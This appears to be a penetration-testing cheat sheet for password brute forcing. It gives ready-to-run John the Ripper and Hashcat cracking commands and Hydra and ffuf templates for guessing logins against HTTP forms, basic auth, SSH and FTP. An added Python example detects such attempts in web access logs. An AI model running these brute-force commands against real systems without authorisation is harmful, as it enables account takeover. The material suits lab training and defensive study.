Brute Force

John The Ripper

Extract the hash from an encrypted .zip

zip2john $ZIP > $OUTPUT

Convert an SSH private key to John format

/usr/share/john/ssh2john.py $FILE > $OUTPUT

Crack a hash

# Without specifying the hash format (John auto-detects it)
john --wordlist=$WORDLIST $FILE_TO_CRACK

Show the cracked password

# If the password was already cracked in an earlier run (read from the pot file)
john --show $FILE

Hashcat

Hash types and mode codes (-m values)

https://hashcat.net/wiki/doku.php?id=example_hashes

Simple wordlist (straight) attack

hashcat -m $HASH_TYPE $HASH_FILE $WORDLIST

Hydra

# Basic Auth Brute Force - Combined Wordlist
hydra -C $WORDLIST $RHOST -s $RPORT http-get /
# Basic Auth Brute Force - User/Pass Wordlists
hydra -L $USER_WORDLIST -P $PASS_WORDLIST -u -f $RHOST -s $RPORT http-get /
# Login Post-Form Brute Force - Static User, Pass Wordlist
hydra -l $USER -P $PASS_WORDLIST -f $RHOST -s $RPORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
# SSH Brute Force - User/Pass Wordlists
hydra -L $USER_WORDLIST -P $PASS_WORDLIST -u -f ssh://$RHOST:$RPORT -t 4
# FTP Brute Force - Static User, Pass Wordlist
hydra -l $USER -P $PASS_WORDLIST ftp://$RHOST
# Switches
-f # Stop after the first successful login is found
-u # Loop over all users for each password (instead of all passwords for each user)
-t 4 # Maximum number of parallel connections (tasks) per target
-I # Ignore an existing restore file (do not wait for the previous session)
# List supported services (protocol modules)
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
# Show the 'http-post-form' module usage and its template
hydra http-post-form -U
/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:[F or S]=[failure or success string]
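
The defender's side of the http-post-form attempts above: an added example (not part of this cheat sheet) in Python that parses combined-format web access log lines and flags any client sending a threshold number of non-redirecting POSTs to the login path inside a sliding time window. The sample log lines, the /login.php path and the "302 means a successful login" rule are constructed assumptions for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev

def find_bruteforce(lines, login_path="/login.php", threshold=5, window_s=60):
    """Return {ip: peak attempts} for clients that POSTed to login_path at least
    `threshold` times inside any window_s-second sliding window. A 3xx answer is
    assumed to be a successful login (redirect) and is not counted as a failure."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent failed POSTs
    peak = defaultdict(int)
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["method"] != "POST" or ev["path"] != login_path:
            continue
        if 300 <= ev["status"] < 400:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:   # drop entries outside the window
            q.popleft()
        peak[ev["ip"]] = max(peak[ev["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

# Constructed sample log: six failed POSTs from one client within ten seconds
# (the User-Agent shown is hydra's default unless the operator overrides it),
# then one successful login (302) from a different client.
SAMPLE = [
    f'203.0.113.7 - - [10/Mar/2024:12:00:{s:02d} +0000] "POST /login.php HTTP/1.1" '
    f'200 1532 "-" "Mozilla/5.0 (Hydra)"' for s in range(0, 12, 2)
] + ['198.51.100.2 - - [10/Mar/2024:12:00:15 +0000] "POST /login.php HTTP/1.1" '
     '302 0 "-" "Mozilla/5.0"']
```

Running `find_bruteforce(SAMPLE)` on the constructed lines flags only 203.0.113.7; tune `threshold` and `window_s` to the application's real login rate before alerting or blocking on it.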

Ffuf

# POST login (multiple wordlists: W1 for users, W2 for passwords; -fc 200 hides responses that re-render the form)
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.164.235/customers/login -fc 200